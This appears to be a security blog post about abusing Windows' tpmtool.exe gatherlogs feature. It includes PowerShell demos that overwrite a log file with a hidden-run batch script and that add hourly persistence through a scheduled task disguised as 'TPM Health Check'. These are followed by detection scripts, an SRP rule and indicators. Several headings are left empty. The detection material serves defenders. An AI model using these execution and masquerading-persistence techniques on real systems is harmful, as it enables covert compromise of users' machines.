TPMTool.exe is the Trusted Platform Module management tool built into Windows.
Attackers can take advantage of two of its properties, that it creates a directory structure on disk and that it is trusted by allowlists, to make it a key component of an attack chain.
Today we take a look at how this tool is used.
Key function: tpmtool gatherlogs [path]
It creates several .txt and .xml files under the specified path.
Abuse value:
```powershell
$d = "$env:TEMP\TPMDiag"
mkdir $d -Force | Out-Null
# tpmtool writes its diagnostic .txt/.xml files into the directory it is given
tpmtool gatherlogs $d 2>$null
$tpmFiles = gci $d -Filter *.txt
if($tpmFiles){
    $target = $tpmFiles[0].FullName
    # the first log file is overwritten with a batch script and then renamed to .bat
    @'
@echo off
start calc.exe
start notepad.exe
echo TPM Module Loaded > %TEMP%\tpm_status.txt
'@ | Out-File $target -Force -Encoding ASCII
    Rename-Item $target "$d\TPMInit.bat" -Force
    Start-Process "$d\TPMInit.bat" -WindowStyle Hidden
    Start-Sleep 2
    if(Get-Process calc -EA 0){Write-Host "Payload executed via TPM file" -F Green}
}
# cleanup of the demonstration
Stop-Process -Name calc,notepad -Force -EA 0
Remove-Item $d -Recurse -Force -EA 0
```
A few important points:
```powershell
$persistDir = "$env:LOCALAPPDATA\Microsoft\TPM"
mkdir $persistDir -Force | Out-Null
# batch file that runs tpmtool and uses its output directory as the trigger condition
$triggerScript = @'
tpmtool gatherlogs C:\Windows\Temp\TPMCache
if exist C:\Windows\Temp\TPMCache\*.txt (
powershell -NoP -W Hidden -C "Start-Process calc.exe"
rmdir /s /q C:\Windows\Temp\TPMCache
)
'@
$triggerScript | Out-File "$persistDir\TPMSchedule.bat" -Encoding ASCII
# scheduled task with a TPM-themed name runs the batch file every hour
schtasks /create /tn "TPM Health Check" /tr "$persistDir\TPMSchedule.bat" /sc hourly /f 2>$null
if($?){Write-Host "Persistence installed using TPMTool trigger" -F Green}
schtasks /run /tn "TPM Health Check" 2>$null
Start-Sleep 3
if(Get-Process calc -EA 0){
    Write-Host "TPMTool trigger successful" -F Green
    Stop-Process -Name calc -Force
}
# cleanup of the demonstration
schtasks /delete /tn "TPM Health Check" /f 2>$null
Remove-Item $persistDir -Recurse -Force -EA 0
```
A few important points:
```powershell
# Event 4688 only carries the command line when "Include command line in process
# creation events" is enabled; otherwise the 'gatherlogs' match below never fires.
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4688} |
    ? {$_.Message -match 'tpmtool.*gatherlogs' -and $_.TimeCreated -gt (Get-Date).AddHours(-1)} |
    % {
        $time = $_.TimeCreated
        # any process creation within five minutes of the tpmtool run
        $followUp = Get-WinEvent -FilterHashtable @{LogName='Security';ID=4688} |
            ? {$_.TimeCreated -gt $time -and $_.TimeCreated -lt $time.AddMinutes(5)}
        if($followUp | ? {$_.Message -match 'cmd|powershell|wscript'}){
            Write-Host "ALERT: TPMTool followed by script execution at $time" -F Red
        }
    }
```
```powershell
$fsw = New-Object System.IO.FileSystemWatcher
$fsw.Path = $env:TEMP
$fsw.Filter = "TPM*"
$fsw.IncludeSubdirectories = $true
$fsw.EnableRaisingEvents = $true
# Created fires when a TPM* directory or file appears; the .txt to .bat rename shown
# above only raises Renamed, so both events run the same check.
$action = {
    $path = $Event.SourceEventArgs.FullPath
    $files = gci $path -Recurse -Include *.bat,*.ps1,*.exe -EA 0
    if($files){
        Write-Host "SUSPICIOUS: Executable in TPM directory: $files" -F Red
    }
}
Register-ObjectEvent -InputObject $fsw -EventName Created -Action $action
Register-ObjectEvent -InputObject $fsw -EventName Renamed -Action $action
```
```powershell
# Software Restriction Policies: a path rule that allows tpmtool only from System32.
# SRP rule levels: 0 = Disallowed, 262144 = Unrestricted. An Unrestricted path rule only
# has an effect when the policy's DefaultLevel is Disallowed, which is what blocks a copy
# of tpmtool running from any other location.
$rule = New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths\$([guid]::NewGuid().ToString('B'))" -Force
New-ItemProperty -Path $rule.PSPath -Name ItemData -Value "C:\Windows\System32\tpmtool.exe" -PropertyType ExpandString | Out-Null
New-ItemProperty -Path $rule.PSPath -Name SaferFlags -Value 0 -PropertyType DWord | Out-Null
# Monitor for tpmtool running from an unexpected location
Get-Process | ? {$_.Name -eq 'tpmtool' -and $_.Path -notlike "*System32*"}
```
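As an added example that is not part of the original post, the check below complements the watcher above by looking at what a TPM* output directory actually contains: tpmtool gatherlogs only writes .txt and .xml, so any other extension (such as a renamed .bat), a PE header, or a script prologue inside a "log" file means the files were replaced. The function name Test-TpmLogDirectory and the constructed sample directory are my own choices.

```powershell
# Added example, not from the original post. Test-TpmLogDirectory is a name chosen here.
function Test-TpmLogDirectory {
    param([Parameter(Mandatory)][string]$Path)
    $findings = @()
    foreach ($f in Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue) {
        # gatherlogs only produces .txt and .xml; any other extension (e.g. a renamed .bat) is foreign
        if ($f.Extension -notin '.txt', '.xml') {
            $findings += [pscustomobject]@{ File = $f.FullName; Reason = "unexpected extension '$($f.Extension)'" }
            continue
        }
        # Read only the first 64 bytes: a PE header or a script prologue means the log was overwritten
        $bytes = New-Object byte[] 64
        $fs = [System.IO.File]::OpenRead($f.FullName)
        try { $n = $fs.Read($bytes, 0, $bytes.Length) } finally { $fs.Dispose() }
        $head = [System.Text.Encoding]::ASCII.GetString($bytes, 0, $n)
        if ($head.StartsWith('MZ')) {
            $findings += [pscustomobject]@{ File = $f.FullName; Reason = 'PE header inside log file' }
        } elseif ($head -match '^\s*(@echo off|powershell|cmd(\.exe)?\s|wscript|cscript|<script)') {
            $findings += [pscustomobject]@{ File = $f.FullName; Reason = 'script content inside log file' }
        }
    }
    return $findings
}

# Constructed sample data standing in for a gatherlogs output folder (not real tpmtool output)
$sample = Join-Path $env:TEMP 'TPMAuditSample'
New-Item -ItemType Directory -Path $sample -Force | Out-Null
Set-Content -Path (Join-Path $sample 'TpmInfo.txt')   -Value 'TPM Version: 2.0' -Encoding ASCII
Set-Content -Path (Join-Path $sample 'TpmEvents.txt') -Value "@echo off`r`necho constructed sample" -Encoding ASCII
Set-Content -Path (Join-Path $sample 'TPMInit.bat')   -Value 'rem constructed sample' -Encoding ASCII
Test-TpmLogDirectory -Path $sample | Format-Table -AutoSize   # reports TpmEvents.txt and TPMInit.bat
Remove-Item -Path $sample -Recurse -Force

# Live use: audit every TPM* directory under the temp folder that the technique above writes to
Get-ChildItem -Path $env:TEMP -Directory -Filter 'TPM*' -ErrorAction SilentlyContinue |
    ForEach-Object { Test-TpmLogDirectory -Path $_.FullName } | Format-Table -AutoSize
```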
Normal tpmtool usage:
Abnormal tpmtool usage:
File characteristics:
%TEMP%\TPM*\*.txt rewritten with non-text content
Process chain:
powershell.exe → tpmtool.exe → cmd.exe
tpmtool.exe → [modified file] → wscript.exe
Timing characteristics:
TPMTool is powerful because: